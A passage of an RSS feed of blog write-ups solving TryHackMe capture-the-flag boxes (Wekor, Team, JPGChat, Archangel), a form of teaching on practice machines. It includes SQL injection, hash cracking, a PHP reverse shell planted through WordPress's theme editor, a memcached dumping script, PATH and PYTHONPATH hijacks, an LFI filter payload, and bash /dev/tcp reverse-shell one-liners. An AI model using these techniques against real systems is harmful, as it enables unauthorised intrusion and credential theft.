            With the parameter marked this way, SQLMap tests only that one, saving time. And time, as they say, is money.</p><p>The method of capturing requests should be almost the same with any other tool you use.</p><p>After some time SQLMap finishes its work. We have a ton of information, but the interesting part is the “wordpress” database, with usernames and password hashes of different users. The hashes are in WordPress’s phpass format (they start with $P$), which hashcat handles as mode 400, “phpass, WordPress (MD5)”. Using hashcat and the <a href="https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt">rockyou</a> wordlist we can easily crack them.</p><pre>hashcat -m 400 -a 0 hashfile.txt /path/to/the/wordlist</pre><p>All password hashes are cracked except for the admin’s; looks like someone is following the rules.</p><p>But we haven’t found any WordPress blog yet, and there is nothing else left to uncover on this website. So let’s try virtual host brute-forcing with GoBuster (its vhost mode). After GoBuster finishes, we have a result: the site has a subdomain, “site”, which hosts a WordPress blog (map it in /etc/hosts so the name resolves to the box).<br>Navigating to “/wp-admin” we get a login form. Let’s try the credentials we got.</p><p>With the first set of credentials we get nothing interesting: Jeffrey is just a normal WordPress user with no rights.<br>With the second set, we see that Yura is a WordPress admin. Awesome! This means we can get a reverse shell.</p><p>To get the reverse shell, navigate to “Theme Editor”, where we can edit any template of the active theme. I decided to edit “404.php”. 
            Paste the <a href="https://github.com/pentestmonkey/php-reverse-shell">php-reverse-shell</a> by <a href="https://github.com/pentestmonkey">pentestmonkey</a> into it, change the ip and port fields of the script to your own, and save the template.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*tDV2NS34FEecxXdQm_SQ-g.png" /></figure><p>Then, with netcat listening on that port, request /wp-content/themes/twentytwentyone/404.php on the blog to trigger the template and catch the reverse shell.</p><p>Once on the machine, we see that we are running as “www-data”. Running linPEAS, we find nothing interesting. Looking at the services listening on the machine, we see one on the higher port 11211.<br>Some Google-Fu tells us that this is “Memcached”, and that it is worth enumerating because it may store sensitive information.<br>Equipped with this information, let’s try enumerating the service.</p><p><em>Wait, what is Memcached and why are we looking for information inside it?</em></p><p>Well, Memcached is a distributed in-memory key-value cache that sits beside an application server. Instead of recomputing an expensive result (a database query, a rendered page fragment, a session lookup) on every request, the application stores it under a key with an expiry time and asks Memcached for it first the next time. Entries live only in RAM and vanish when they expire or are evicted to make room. Two things make it interesting to us: developers often cache exactly the kind of data we want, such as credentials or session tokens, and the classic text protocol has no authentication at all, so anyone who can reach port 11211 can list and read whatever is cached.</p><p>So, let’s get going. 
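</p><p>As an added example, not the write-up’s code, here is a small client for the memcached text protocol that does the same as the telnet session that follows, walking stats items, stats cachedump and get. The replies it parses in demo() are constructed, the values are placeholders rather than the box’s real credentials, and the host and port are assumptions.</p>

```python
"""Minimal memcached text-protocol client: enumerate slab classes, list the
keys in each, read every value. Added example, not the write-up's code; the
sample replies are constructed and the host/port are assumptions."""
import re
import socket

ITEM_RE = re.compile(rb"^ITEM (\S+) \[(\d+) b; (\d+) s\]$")   # one 'stats cachedump' line


def slab_ids(stats_items_reply: bytes) -> list:
    """Slab class ids from a 'stats items' reply (lines 'STAT items:ID:name value')."""
    ids = []
    for line in stats_items_reply.splitlines():
        m = re.match(rb"STAT items:(\d+):", line)
        if m and int(m.group(1)) not in ids:
            ids.append(int(m.group(1)))
    return ids


def cachedump_keys(cachedump_reply: bytes) -> list:
    """Key names from a 'stats cachedump SLAB LIMIT' reply (LIMIT 0 = no limit)."""
    keys = []
    for line in cachedump_reply.splitlines():
        m = ITEM_RE.match(line)
        if m:
            keys.append(m.group(1).decode())
    return keys


def parse_get(get_reply: bytes) -> dict:
    """Parse 'VALUE key flags bytes' / data / ... / 'END' into {key: data}."""
    values, rest = {}, get_reply
    while rest.startswith(b"VALUE "):
        header, _, rest = rest.partition(b"\r\n")
        fields = header.split()
        key, length = fields[1], int(fields[3])
        values[key.decode()] = rest[:length]
        rest = rest[length + 2:]          # skip the data and its trailing CRLF
    return values


def command(sock: socket.socket, line: bytes) -> bytes:
    """Send one command and read until the END terminator."""
    sock.sendall(line + b"\r\n")
    buf = b""
    while not buf.endswith(b"END\r\n"):
        chunk = sock.recv(4096)
        if not chunk:
            break
        buf += chunk
    return buf


def dump_cache(host: str = "127.0.0.1", port: int = 11211) -> dict:
    """Every key/value the server hands out; no authentication is involved."""
    found = {}
    with socket.create_connection((host, port), timeout=5) as s:
        for sid in slab_ids(command(s, b"stats items")):
            for key in cachedump_keys(command(s, b"stats cachedump %d 0" % sid)):
                found.update(parse_get(command(s, b"get " + key.encode())))
    return found


# Constructed replies shaped like the real ones; the values are placeholders.
SAMPLE_STATS_ITEMS = b"STAT items:1:number 2\r\nSTAT items:1:age 1337\r\nEND\r\n"
SAMPLE_CACHEDUMP = b"ITEM user [4 b; 1615290000 s]\r\nITEM password [13 b; 1615290000 s]\r\nEND\r\n"
SAMPLE_GETS = {
    "user": b"VALUE user 0 4\r\norka\r\nEND\r\n",
    "password": b"VALUE password 0 13\r\nn0t-the-r3al1\r\nEND\r\n",
}


def demo() -> dict:
    """Run the parsers over the constructed replies, in the same order dump_cache() uses."""
    found = {}
    for _sid in slab_ids(SAMPLE_STATS_ITEMS):
        for key in cachedump_keys(SAMPLE_CACHEDUMP):
            found.update(parse_get(SAMPLE_GETS[key]))
    return found
```

<p>dump_cache() talks to a live server, while demo() exercises the parsers offline. One caveat for real use: stats cachedump is a debugging command whose output is capped, and some builds disable it, so an empty key list is not proof that the cache holds nothing.</p><p>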
We can connect to the service using Telnet.</p><pre>telnet localhost 11211<br>stats items (shows everything in the cache)<br>stats cachedump 1 0 (dump everything in slab id 1)<br>get user (user query information in the cache)<br>get password (password query information in the cache)</pre><pre>press Ctrl+] to bring up the telnet prompt<br>type close to exit from telnet</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ppE4p2_I0lI5cZmZd__6OQ.png" /></figure><p>We get the password for the user Orka.<br>Running linPEAS again on the machine, we find that our user can write in the <strong>“/usr/sbin” </strong>directory. Let’s keep this information in the back of our mind, as it will prove very useful in a bit.<br>Running sudo -l, we see that our user can only run an ELF binary, “bitcoin”, as root. Running the executable, it prompts us for a password, which we don’t have.</p><p>Transferring the binary to our machine and reversing it using Ghidra, we find the required password, and we see that the binary is making a system call to a script, “tranfer.py”. <br>The binary is using an absolute path for calling the script, and an absolute path was used for the binary in the sudoers file, but it is using a relative path for calling the python binary. 
And <em>remember</em>, we can <strong>write</strong> to “/usr/sbin”, which has a higher precedence (on this machine) over “/usr/bin”, where the actual python binary resides.<br>What this means is that the system will look for the python binary in “/usr/sbin” before looking anywhere else, which means we can place our own bogus program, give it the same name, and the system will execute it instead of the actual python binary.</p><p>Let’s cd to “/usr/sbin”, then:</p><pre>touch python (create a file named python)<br>vim python   (put in the bogus code)<br>     #!/bin/bash<br>     /bin/bash<br>     :wq!<br>chmod +x python (give it executable permission)</pre><p>Let’s try executing our bogus python binary.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*EjmqLyoP3giWMuGpQTPRYQ.png" /></figure><p>And voilà, we get our root shell.</p><p>So, that was the box, hope you guys enjoyed it.</p><p>If you have any suggestions, do let me know in the comments.</p><p>Have a beautiful day!</p><hr><p><a href="https://infosecwriteups.com/tryhackme-wekor-writeup-a01b851f651d">TryHackMe | Wekor Writeup</a> was originally published in <a href="https://infosecwriteups.com">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[TryHackMe | Team Writeup]]></title>
            <link>https://infosecwriteups.com/tryhackme-team-writeup-e8ba56dcbce9?source=rss-595cd3c0d173------2</link>
            <guid isPermaLink="false">https://medium.com/p/e8ba56dcbce9</guid>
            <category><![CDATA[ctf-writeup]]></category>
            <category><![CDATA[ctf]]></category>
            <category><![CDATA[tryhackme-walkthrough]]></category>
            <category><![CDATA[writeup]]></category>
            <category><![CDATA[tryhackme]]></category>
            <dc:creator><![CDATA[Anubhav Uniyal]]></dc:creator>
            <pubDate>Sun, 07 Mar 2021 07:50:43 GMT</pubDate>
            <atom:updated>2021-03-09T13:27:14.323Z</atom:updated>
            <content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*E6oFD3gfEXYFPFOAzN6-dA.png" /></figure><h3><strong>Overview</strong></h3><p>Hey, how’s it going, everybody. I am back with another write-up, this time trying Team by dalemazza.</p><ul><li><a href="https://tryhackme.com/room/teamcw">Team</a></li><li><a href="https://tryhackme.com/p/dalemazza">TryHackMe | dalemazza</a></li></ul><p>This was an easy rated box, but in my opinion it should have been a medium rated box, just because of the sheer number of steps required to gain the initial foothold on the machine. On visiting the website, we are greeted with a default Apache2 page. After some initial recon, we find that the box is using a virtual host domain; on visiting the second domain, we fuzz for the credentials of the FTP service running on port 21. From there we find the name of the subdomain, and on visiting it we see that a PHP script on the domain is vulnerable to LFI. Using the LFI, we fuzz again, this time to find the SSH key of the user. After SSH’ing into the machine, we first do a lateral privilege escalation to gain access to another user on the box. After that, we edit a script run by a root cronjob to gain a reverse shell as root. Without anything else to say, let’s get started.</p><h3>Let’s Break In!</h3><p>As always, start off with an NMap scan.</p><pre>sudo nmap -sS -sV -sC -oA nmap/team *THM Box IP* -vv</pre><blockquote><em>Here -sS: SYN Scan, -sC: for “Safe” scripts, or default scripts, -sV: for version enumeration, -oA: output in all formats (Greppable, XML and default NMap output), -vv: for verbose.</em></blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*BMISRrGb0eQAvXYCstrXQg.png" /></figure><p>On running the NMap scan, we have 3 ports open: 21 (ftp), 22 (ssh) and 80 (http). The ftp service has anonymous login disabled, so let’s visit the web-server running on port 80. 
On visiting the web-server, we are greeted with a default Apache page. Using GoBuster to find anything interesting, we get nothing.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*uJ9Bot-UHpgzd6DVoxI0aQ.png" /></figure><pre>cat /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt | grep -v -P '^\.' | gobuster dir -u http://*THM box IP*/ -w - -o gobuster.log -t 50 -x php</pre><blockquote>Here, dir: to specify directory brute-forcing, -u: to specify the target URL, -w: to specify the word list; I use raft-small-words.txt. It is included in SecLists over at GitHub, which you can clone in your own distribution, and I recommend that you do, because they are very useful. Otherwise you can just download this particular word list from <a href="https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/raft-small-directories.txt"><strong>here</strong></a>. -x: to specify the extension. This switch will add a .php after every word to check if a file also exists. You can specify multiple file types, separated by a comma. -t (--threads): to specify the number of processes making requests at a time. Use this switch very cautiously, as in the real world, a huge number of requests to a website will get you blacklisted. Since this is a virtual environment, it shouldn’t be a problem. -o: to specify the output file.</blockquote><p>I used grep to remove any lines that began with a ‘.’, since anything beginning with it was giving a 403 (not authorized) error code, and it was cluttering the screen.</p><p>After finding nothing on the default page, I tried adding the <strong>team.thm</strong> domain to my ‘/etc/hosts’ so that my browser can redirect me to it. And sure enough, there was another webpage on the server. 
It would appear that the server is using Virtual Domain Name Hosting.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*EHi5GguQW7fl6290_skpZA.png" /></figure><p>Using GoBuster on this domain, we get multiple hits, but only two of them seemed interesting: robots.txt and /scripts/. Visiting robots.txt, we see that there is only one word in the file, ‘dale’; guessing that it might be a username, I moved forward. Visiting /scripts/, we are not authorized to view the root directory, so again let’s use GoBuster on it to see if we are authorized to view any file. After GoBuster finished, we see that we are authorized to view just one file, ‘script.txt’.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*F4pmX2uWSGb2ngs7AnDN2Q.png" /></figure><p>The user had a note that there was another file with the name script, but it had its extension changed as it had <strong>credentials</strong> in it. So, let’s fuzz for the extension using ffuf.</p><pre>ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-small-extensions.txt -u 'http://team.thm/scripts/scriptFUZZ' -fc 403,404</pre><blockquote>Here, -w: to specify the word-list to use, -u: to specify the URL to fuzz, FUZZ: to specify the location in the URL to fuzz, -fc: to filter the results by HTTP status code.</blockquote><p>Using the above command, we find the extension of the old script, and with it the credentials to the ftp server.</p><p>Getting into the ftp server, we find a file named New_site.txt. Reading it, we find that the user also has a ‘.dev’ website hosted on the server. 
Using GoBuster in vhost mode, we find a subdomain for team.thm.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*csPHGcjkudp5FdMz3nql6A.png" /></figure><pre>gobuster vhost -u http://team.thm/ -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -o gobuster.vhost.log -t 100</pre><p>After adding the new subdomain to our ‘/etc/hosts’, let’s visit the web-site. On visiting the website, it was evident that the website is still in development. Clicking on the only link on the website, we see that it is a PHP script, probably using the include function. Testing the variable ‘page’, we see that it is vulnerable to LFI.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*wb0WTu1eP4X4t7K6vgnlZA.png" /></figure><p>Now, this part took me a hot minute to complete. In the New_site.txt it was mentioned that the user dale has to copy his ‘id_rsa’ key and save it in a config file. After trying different methods to escalate the LFI to RCE, and failing spectacularly, I tried fuzzing for the ‘id_rsa’.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*LJ3a5nP0IHbOzKPIx8XCzQ.png" /></figure><p>Using the <a href="https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt">LFI-Jhaddix.txt</a> word-list in <a href="https://github.com/danielmiessler/SecLists">seclists</a>, and ffuf, I finally got the ‘id_rsa’ for the user dale. Oh!, <em>sweet-release</em>.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*QbP5FF6P3bVNr0xZ975xqg.png" /></figure><p>I am leaving the ssh-key here, I know it’s against the rules, but dude, if you can type a whole-ass ssh key without trying to actually find it, you are freaking c̶r̶a̶z̶y amazing. Anyhow, moving on. After using some Linux-foo to get the key back in its original format, let’s ssh into the machine.</p><p><strong>P.S. </strong>To get the key in the original format, just paste it into a file. 
Let’s call it a.txt, then do cat a.txt | sed 's/ #/\r\n/g' &gt; id_rsa . To simplify what is happening here: we are using sed to replace any occurrence of ‘ #’ with a newline.</p><p>Or, you can just do it manually.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*1AyDgqc2BbgC0LM6YFEnlA.png" /></figure><p>After getting into the machine, we see that there is another user, ‘gyles’, on the machine. As Gyles was instructing dale, it is safe to assume that the user Gyles has more privileges than our current user. On running sudo -l as the user dale, we see that we can run a script ‘admin_checks’ as user gyles with elevated privileges and NOPASSWD. Reading the script ‘admin_check’, it asks for the user’s name and date, and then passes the ‘date variable’ to the ‘date command’ to be executed. This was very easy to exploit: just pass ‘/bin/bash’ as the date, and we have a shell.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fGVuTtzjRS6qyaoNUKxXYQ.png" /></figure><p>After some poking around, I was unable to find anything. So, I transferred <a href="https://github.com/DominicBreuker/pspy">pspy</a> over from my machine, to look for any processes running in the background. After waiting some time, we see that root is running a cronjob for ‘script.sh’. On checking the permissions on the script, we see that our user is able to edit script.sh. So let’s edit it to gain a reverse shell on our machine.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*fsMun3koDxIbTuH2_o5aKg.png" /></figure><p>Save it, and start a listener on your machine to listen for an incoming connection from the box. After waiting a few seconds, we get a reverse shell back on our machine as the root user.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ZSWIT7V_xRy6-0TvenEWNg.png" /></figure><p>So, that was the box. 
Hope you guys enjoyed it.</p><p>If you have any suggestions, let me know in the comments.</p><p>Have a beautiful day!</p><hr><p><a href="https://infosecwriteups.com/tryhackme-team-writeup-e8ba56dcbce9">TryHackMe | Team Writeup</a> was originally published in <a href="https://infosecwriteups.com">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[TryHackMe | JPGChat Writeup]]></title>
            <link>https://infosecwriteups.com/tryhackme-jpgchat-writeup-5a6ec94c2c8d?source=rss-595cd3c0d173------2</link>
            <guid isPermaLink="false">https://medium.com/p/5a6ec94c2c8d</guid>
            <category><![CDATA[writeup]]></category>
            <category><![CDATA[ctf]]></category>
            <category><![CDATA[ctf-writeup]]></category>
            <category><![CDATA[tryhackme]]></category>
            <category><![CDATA[walkthrough]]></category>
            <dc:creator><![CDATA[Anubhav Uniyal]]></dc:creator>
            <pubDate>Mon, 01 Mar 2021 08:41:41 GMT</pubDate>
            <atom:updated>2021-03-03T18:06:23.919Z</atom:updated>
            <content:encoded><![CDATA[<h3>Overview</h3><p>Hey, how is it going, everybody. I am back with another write-up, this time trying <a href="https://tryhackme.com/room/jpgchat"><em>JPGChat</em></a> by <a href="https://tryhackme.com/p/R4v3n"><em>R4v3n</em></a>. This was a rather easy box, with one interesting twist: you have to do a little GitHub search to find the source code of the chatting service. From there, you get a reverse shell back and gain the initial foothold. After that, there was one python executable that the user could run with root privileges without a password. To exploit it, you had to spoof the PYTHONPATH variable. So, without anything else to say, let’s start with the box.</p><h3>Let’s Break In!</h3><p>As always, start off with an NMap scan.</p><pre>sudo nmap -sS -sV -sC -oA nmap/chat *THM Box IP* -vv</pre><blockquote>Here -sS: SYN Scan, -sC: for “Safe” scripts, or default scripts, -sV: for version enumeration, -oA: output in all formats (Greppable, XML and default NMap output), -vv: for verbose.</blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8pABKVs8A_hVsWdeDZ4Cpw.png" /></figure><p>After NMap finished scanning, we see that we only have two ports open: 22 (ssh) and 3000 (ppp). On visiting the service on port 3000 through our browser, we see that we have some instructions on how to use the service. But the service was not fully functional when visiting through the web-browser.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*V7iuwx6buHuUur5YspIFIw.png" /></figure><p>So let’s use NetCat to connect to the service.</p><pre>nc *THM Box IP* 3000 </pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*gZ8_KvtVVTKjsLB1JEWsNA.png" /></figure><p>After connecting through NetCat, we see that both the messaging and the reporting functionality are available to us. The service also tells us that the source code can be found at the admin’s GitHub. 
To find the admin’s name, we connect to the [REPORT] functionality of the service, and the service leaks the <strong>admin’s</strong> name. Now, to find the source code, after just a little bit of poking around on GitHub, we find the source code of the service.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*kqle3DkZCJ1j3GHgk_-A8Q.png" /></figure><p>The service is making use of the os module of python and running the commands using the bash shell. We can easily get a reverse shell by using the generic bash reverse shell one-liner.</p><pre>bash -i &gt;&amp; /dev/tcp/*Your OpenVPN IP*/*port you’re listening on*</pre><p>The machine did get a connection, but it was always breaking for some reason. So, let’s use another one-liner with encoded characters.</p><pre>0&lt;&amp;196;exec 196&lt;&gt;/dev/tcp/10.0.0.1/4242; sh &lt;&amp;196 &gt;&amp;196 2&gt;&amp;196</pre><blockquote>For more awesome one-liners like this, visit <a href="https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#bash-tcp"><em>swisskyrepo’s</em></a> GitHub repository.</blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*EmqjSQhb9l7b3ix9sw7cNA.png" /></figure><p>And this time we got the reverse shell without any issues. But this shell was not usable, because the command outputs were not visible on screen. We did, however, have command execution. So, we can once again make the machine connect to us, to gain a reverse shell.</p><pre>bash -c &#39;bash -i &gt;&amp; /dev/tcp/*Your OpenVPN IP*/*port you’re listening on*&#39;</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*XvfWMNs0Twt0z67V1qaZoA.png" /></figure><p>Now we have a usable shell. Let’s upgrade to a full TTY shell.</p><pre>python3 -c 'import pty; pty.spawn("/bin/bash")'</pre><p>This will give you a slightly better shell, but without those magical features. 
To get a fully functioning TTY shell:</p><pre>Press Ctrl-z to background the current shell, then on your terminal type:<br>stty raw -echo; fg &lt;enter&gt;&lt;enter&gt;</pre><p>Then on your shell:</p><pre>stty rows 36 cols 136<br>export TERM=xterm-256color</pre><p><strong>User-Flag:</strong> THM{w4it_h0w_c4n_th3s_b3}</p><p>Now, to escalate our privileges to root. Running sudo -l, we get a prompt that our user can run test-module.py as root NOPASSWD. We cannot modify the script, but we can read it.</p><p>The script is importing a compare module; this means we can spoof the PYTHONPATH variable, create our own bogus compare.py module, and use it to get root.</p><pre>cd /tmp</pre><pre>export PYTHONPATH=$PWD<br>touch compare.py<br>chmod +x compare.py</pre><p><strong>Wait</strong>!, but what is PYTHONPATH, and how did you know this script is using it? Worry not, for I am about to tell you just that.</p><p>So, PYTHONPATH is an environment variable and, as the name suggests, is the PATH in which the python script looks for the invoked modules<strong> IF </strong>the module is not in the default global directory. So, that means if for instance a python script was trying to invoke a predefined module (ex. os), spoofing the PYTHONPATH will have no effect on the script, as it won’t access the path variable.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*urgBYXSzeV6yL7I7tLDnmw.png" /></figure><p>How did we know the script was using it? Firstly, when you run sudo -l, notice on the upper right corner it says env_keep+=PYTHONPATH, which means that when invoking anything as sudo, it will keep the PYTHONPATH environment variable. 
Secondly, if you read the script, and if you have a little bit of python programming knowledge, you’ll notice that the module “compare” which is being imported is not a standard module of the python programming language, which can mean that the user might not have installed it in the global directory, which again leads to the same conclusion.</p><p>Now, inside compare.py, make a system call to invoke bash as sudo.</p><pre>#!/usr/bin/env python3<br>import os</pre><pre>os.system(&quot;/bin/bash&quot;)</pre><p><em>What just happened here?</em></p><p>Well, this script is very basic, but not all of you might understand what happened here. So, we imported a module called os, which gives us the capability of calling and executing system commands from our script; then we used the system function to invoke a bash shell. If you run this script as a normal user, nothing will change. But if you run this with root privileges, you’ll have a root shell.</p><p><em>That is all fine, but why did importing a module get us a root shell?</em></p><p>Well, when you import a module in python, or in any other language really, it can either import a specified function or class in that module, or the whole package. In this scenario, it is importing the <em>whole package</em> (specified by the ‘*’ wildcard). Then, it invokes a function in the compare module; as soon as that line gets executed, our bogus module starts doing its thing. It invokes a bash shell with root privileges, and the script is stuck in the background. When you exit from the root shell, back to the normal user, you might’ve noticed that it gives an error: the specified function was not found. 
This means that all this time, the script was stuck calling the function, which gave our shell persistence.</p><p>This was just a very layman’s explanation of it; if you want to get into the really technical details, read <a href="https://medium.com/python-features/what-happens-behind-the-scenes-when-we-import-a-module-in-python-2775da153790"><strong><em>this</em></strong></a> very thorough article.</p><p>Now, run the test-module.py as sudo. And we get root.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*P5mMUBWIqh8IcoPa7aW3Ag.png" /></figure><p><strong>Root-Flag:</strong> THM{h4h4h4_g0t_y4_sUck3rs}</p><p>So, that was the box, hope you guys enjoyed it.</p><p>Have a beautiful day!</p><hr><p><a href="https://infosecwriteups.com/tryhackme-jpgchat-writeup-5a6ec94c2c8d">TryHackMe | JPGChat Writeup</a> was originally published in <a href="https://infosecwriteups.com">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
        </item>
        <item>
            <title><![CDATA[TryHackMe | Archangel Writeup]]></title>
            <link>https://anubhavuniyal.medium.com/tryhackme-archangel-writeup-fb61a378824?source=rss-595cd3c0d173------2</link>
            <guid isPermaLink="false">https://medium.com/p/fb61a378824</guid>
            <category><![CDATA[ctf-writeup]]></category>
            <category><![CDATA[tryhackme-walkthrough]]></category>
            <category><![CDATA[ctf]]></category>
            <category><![CDATA[tryhackme]]></category>
            <category><![CDATA[tryhackme-writeup]]></category>
            <dc:creator><![CDATA[Anubhav Uniyal]]></dc:creator>
            <pubDate>Thu, 04 Feb 2021 15:24:22 GMT</pubDate>
            <atom:updated>2021-02-06T16:14:07.094Z</atom:updated>
            <content:encoded><![CDATA[<p>Hey, let’s go, my second write-up. I hope you liked my previous write-up of Madeye’s Castle.</p><p>You can find this room here: <a href="https://tryhackme.com/room/archangel">https://tryhackme.com/room/archangel</a></p><h3>Overview</h3><p>This is an Easy rated boot2root box, made by TryHackMe user <a href="https://tryhackme.com/p/Archangel">Archangel</a>. This box makes use of the Virtual Domain Name Hosting method. Once you get to the correct domain, you have to exploit the PHP include() function to get an LFI, and then use that LFI to get a reverse shell on the machine. Once in, you need to exploit a cronjob to gain horizontal privilege. Finally, you need to spoof the PATH variable to gain root access. Without any further ado, let’s get into it.</p><h3>Let’s Break In!</h3><p>Like always, first start with an Nmap scan:</p><pre>sudo nmap -sS -sV -sC -oA nmap/archangel *THM Box IP* -vv</pre><blockquote>Here -sS: SYN Scan, -sC: for “Safe” scripts, or default scripts, -sV: for version enumeration, -oA: output in all formats (Greppable, XML and default Nmap output), -vv: for verbose.</blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*3Q9iq0eULp8htl9psaV2ug.jpeg" /></figure><p>The Nmap scan completed fairly quickly, and we see that two ports are open on this machine: port 80 and port 22, which are the default ports for HTTP and SSH respectively. Since we don’t have any way to log in to SSH right now, let’s visit the webpage hosted on this machine.</p><p>On visiting the machine, we can see that it is filled with a lot of Lorem Ipsum, nothing interesting there. Except we see a domain-based email, “mafialive.thm”, in the website’s contact info. It would appear that this website is using virtual domain name hosting. 
If you’d like to know more about VDNH, you can do so by going <a href="https://anubhavuniyal.medium.com/tryhackme-madeyes-castle-writeup-e637db17da31">here</a>, where I go into more detail on this topic.</p><p>Coming back to our machine, add the new domain to our hosts file (IP address&lt;space&gt;domain name), and let’s visit this website. On opening the website, a message appears saying this website is under development, with our very first flag displayed right under it.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*cwUwRVY8Typ8oJm_aWWBIg.jpeg" /><figcaption>Flag has been <strong>redacted</strong></figcaption></figure><p>Next, we are asked to find a page under development. Now, there are two ways you can go about it:</p><p>The very first and clever way (which my dumb-ass totally didn’t think of) is visiting the robots.txt file, and there you have it: “test.php”.</p><p>What is robots.txt, you ask? Consider it as a gatekeeper for a website. Ever wonder why sensitive data, such as admin webpages, assets and other information that a website stores, never shows up when you search for something? robots.txt is your answer. Whenever a search-engine starts crawling a website for information, it first visits robots.txt, which then tells the search-engine what locations it can and cannot crawl. So this information never shows up on search engines. The only problem with this: robots.txt <strong>has </strong>to be publicly accessible for the search-engine to view it. This means that anyone in the world, with a little technological knowledge, can also read this file and visit the sup3r-s3cr3t location manually, completely defeating the purpose. This is the reason why different methods like .htaccess were invented, where you can implement user authentication for your secret webpage.</p><p>The second, and the scrub way of doing it, is by FUZZING the website. Yay, now I don’t have to do any thinking! 
Just kidding, most of the time you will have to use a fuzzing tool in your workflow; I know I have to in every other box.<br>I like to use Gobuster for this task, you can use any tool you prefer.</p><pre>gobuster dir -u http://mafialive.thm/ -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt -x php,txt --threads 50 -o gobuster.out</pre><blockquote>Here, <strong>dir</strong>: to specify directory brute-forcing, -u to specify the target URL, <strong>-w</strong> to specify the word-list; I use raft-small-directories.txt. It is included in the SecLists over at GitHub, which you can clone in your own distro, and I recommend that you do, because they are very useful. Otherwise you can just download this particular word-list from <a href="https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/raft-small-directories.txt"><strong>here</strong></a>. <strong>-x</strong>: to specify the extension. This switch will add a .php and a .txt after every directory name to check if a file with the same name (also) exists. You can specify multiple file types, separated by a comma. <strong>--threads</strong>: to specify the number of requests made at a time. Use this switch very cautiously, as in the real world, a huge number of requests to a website will get you blacklisted. Since this is a virtual environment, it shouldn’t be a problem. <strong>-o</strong>: to specify the output file.</blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*RHTACEplrvbeVAalbwBa9w.jpeg" /></figure><p>And Gobuster displays the same expected output, “test.php”, so let’s go to this location. On visiting the location, we see that this webpage wasn’t supposed to be deployed, which means lax security. <em>*Happy Hacker Noises*</em>.</p><p>There is a button present on the webpage; pressing it displays a message “Control is an illusion”. A Mr. Robot reference, nice! 
And aptly placed too, because we are about to take away control using <strong>LFI</strong> (Local File Inclusion). Proxying the request through Burp, we capture it and send it to Burp Repeater for further inspection.<br>After testing for LFI using some basic payloads, nothing turned up. I can’t read any file from outside the given directory; probably there is a check in place. We know a “robots.txt” file exists in this directory, so let’s try that. Substituting “mrrobot.php” with “robots.txt”, the content of “robots.txt” was reflected. <em>Success!</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*ZuGqojEUvYydebHfZALAzw.jpeg" /></figure><p>The next step was to actually examine test.php, which should also be in the same folder. Replacing “robots.txt” with “test.php”, nothing turned up. Weird. Then I remembered that it was a PHP file, and won’t be rendered as normal text. So, to actually read the contents of the file, I needed to convert it to something else. PHP has an inbuilt filter to convert normal text to base64, so using that, the payload then became:</p><pre>http://mafialive.thm/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*uvwlJGT_rk-5B1OVGWesfQ.jpeg" /></figure><p>And we get the output in base64. We can decode it using <a href="https://gchq.github.io/CyberChef/"><em>CyberChef</em></a>, or anything else really, and read the contents of test.php.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*dPXYAx39wWaJPPr3kPskJg.jpeg" /></figure><p>We can see that indeed there was a check in place, so that we can’t traverse our path, and that “/var/www/html/development_testing” has to be included. So anything that we can do is restricted to this directory only, or is it!? <em>(*Getting Dem Phoenix Wright Feels*)</em>. 
